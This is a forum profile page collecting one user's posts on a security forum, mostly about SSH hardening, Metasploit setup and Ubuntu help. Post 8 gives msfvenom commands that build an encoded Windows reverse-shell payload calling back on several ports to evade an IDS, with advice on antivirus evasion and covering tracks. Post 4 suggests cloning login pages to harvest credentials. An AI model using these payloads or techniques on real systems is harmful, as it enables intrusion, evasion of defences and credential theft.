bobbyb1980

Everything posted by bobbyb1980

  1. This type of thing isn't as widely accepted in the Spanish speaking world (Latin America) as it is in the States/EU and people tend to be a bit less public about their works. Tons of metasploit contributions though, just not signed w/first and last names. What exactly is it you're wanting to make contact about?
  2. You could create a script that monitors the log file and if there are x amount of failed attempts, it will append that IP to /etc/hosts.deny. This can also be done at the firewall level.
  3. This is very common, at least in my limited experience. They're probably automated bots. You can limit the number of attempts per minute in IPtables. Careful though if you're working on a machine where SSH is your only access to it. You can also disable root logins and/or enable SSH keys as the login method.
  4. If I remember correctly SET uses a python script to harvest credentials and personally I don't think the script used there is the best way to do it. I'd just clone the page myself and use one of the million PHP scripts to write the credentials to a file. Read Darren's tutorial on cloning pages.
  5. I think a lot of those games from the stone age can be "legally" (more or less) downloaded. The ROMS are super easy to download, I'm going to guess since it's so easy to just google and download them either it's legal or the companies just don't care. For what it's worth, half those companies from the 80's and 90's are long dead anyways, like SNK, creators of the single best game to ever exist - Metal Slug.
  6. I've caught other rogue AP's in the wild before. All I can say is, guys, don't keep your password file in a directory accessible through your web server : P Pineapple used to come default like that, not sure if it does anymore.
  7. I think they give a bad name to hackers, conduct themselves like teenagers and are a complete waste of valuable bandwidth. One day they'll learn change doesn't come by whining on the internet and posting people's private info. Imagine the world we'd live in if George Washington had thought that "revolution" meant handing out copies of the Queen's diary. I'm glad he knew the real meaning of the word though!
  8. digip - Thank you for your reply. Generating C based shellcode and compiling it into a pexe or into some other exploit has a near 100% antivirus evasion success rate so writing to disk isn't really a problem. Once you get the shell u just migrate and delete the payload and run the normal "clean up your tracks" tasks and all should be good in the world. Setting up RDP and VPN's is outside the scope of my objective, router is hard as a rock also. Just need a basic shell. I've solved the problem (I think) so perhaps others would like to take a look.

     My problem is that I'm doing a lab with a beefy IDS setup. The goal is to have one .exe that will call out to multiple handlers on multiple ports so if one port fails, then hopefully another will work in attempts to evade the IDS/firewall. The following code SHOULD do that, still need to run some tests but based on past experience I think it will work (don't have my machine handy to test : ( ). God willing the ports aren't filtered.

         msfvenom -p windows/shell/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=80 exitfunc=thread > /tmp/80.raw
         msfvenom -p windows/shell/reverse_tcp -f raw -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=53 exitfunc=thread -c /tmp/80.raw > /tmp/53.raw
         msfvenom -p windows/shell/reverse_tcp -f c -e x86/shikata_ga_nai LHOST=192.168.91.135 LPORT=21 exitfunc=thread -c /tmp/53.raw > 215380.c

     We're hackers - we create our own built in functionality : )
  9. VLC and 10 million different plugins for it should be available via Ubuntu Software Center. Python 2.6 also comes installed by default in Ubuntu so you shouldn't need to be installing that either, something doesn't sound right. What version of Ubuntu are you using? When was the last time you updated?
  10. Hey guys. Was wondering if anyone would be able to help me with the following: I'm trying to generate shellcode that I can compile that will call out to multiple ports. For example, I'd want a windows/meterpreter/reverse_tcp payload that connects back to listeners on port 80, 21 and 443. I know this is possible with msfvenom to generate an .exe but I really just only need the first stage of the meterpreter payload(s) in shellcode. Thanks.
  11. bobbyb1980

    Windows 8

    Has anyone downloaded the pre release and started pwning already? Anything decent to report?
  12. Wow. Great find! Going to give it a test run tomorrow.
  13. Have you tried installing it from Ubuntu Software Center?
  14. My guess is that you've only captured one or two of the required 4 eapol packets. Don't think you're going to be able to crack it.
  15. Armitage seems to give a lot of people problems. Unless you're specifically working in Windows for development purposes or something else, I think it might be a little less problematic on a linux based OS.
  16. The computers are more or less secure, the humans are not. The groups taking down big scores aren't using IRC and ddos attacks to do it, they're socially engineering other humans. FYI - IRC played a key role in comms in the 2003 Iraq invasion for whatever that's worth and it went completely fine. I know it's good for business, but I hope you do realize that if everyone goes around preaching about how unsafe/insecure the internet is, eventually people won't use it any more.
  17. Before I got into security I worked as a translator. Rosetta Stone has a pretty good interface for voice analysis and comparison, it gives a nice easy to read output in graph format. When we would train in accent optimization, we would have to speak into a microphone, then compare that output to that of a native speaker and work to get them as close to each other as possible to try to perfect an accent. Your base idea is very possible: have someone say "attack", have a script that iterates the input from a mic (you'd have to convert a graph to a textual representation or something that can be easily iterated, not easy but not impossible either, that's if Rosetta Stone were used but tons of other possibilities), then based on those results executes a command accordingly, like a deauth attack. From what little I know, I'd say the tough part is going to be getting that script to recognize other accents besides your own. The way that the word "hello" looks on a graph spoken by someone from California looks extremely different than that of someone from New York, and even more different than London, etc etc.
  18. Starting to see it's not so bad, pretty awesome too : )
  19. Have you configured it? Metasploit needs to know a l/p to be able to connect to the db.
  20. You need to install and/or configure postgres.
  21. That's the spirit, no need to hide if you have nothing to hide : )
  22. If you think we don't have huge amounts of resources invested into "hacking" then you're very wrong. I also wouldn't pay too much mind to what the media says about American infosec, it's common knowledge that they sell a non existent "cyber war" so a handful of contractors can continue to leech DoD funds. A war will not be won or lost in cyberspace and computers play a very small part in actual warfare. Frankly it's just funny what some of these security groups talk about when they use the term "cyber war".
  23. I usually use msfpayload and msfencode with -t exe for kicking out payloads in PE form. You can also do -f exe with msfvenom, iirc (don't have my bt5 vm up at the moment). Thanks for the tip. You mean like piping msfpayload to msfencode (same thing in essence as msfvenom ie msfpayload multi/handler PAYLOAD=... | msfencode .... -o whatever.exe?) for an .exe? If I understand you right, I tried that but was being picked up on most anti virus scanners. I also tried msfvenom with various iteration combos w/no luck. I think most of the av's are going to detect msfencoded data. Currently trying to learn shellcoding and it can be a real brain twister. Doing these labs, http://projectshellcode.com/?q=node/12 .
  24. Haha that's awesome man! Nothing like an old fashioned brute force attack. Surprising how they claim it's secure, many routers now are requiring the user to input a captcha image to avoid these attacks.
  25. Don't like how all the media paints the US as technologically behind.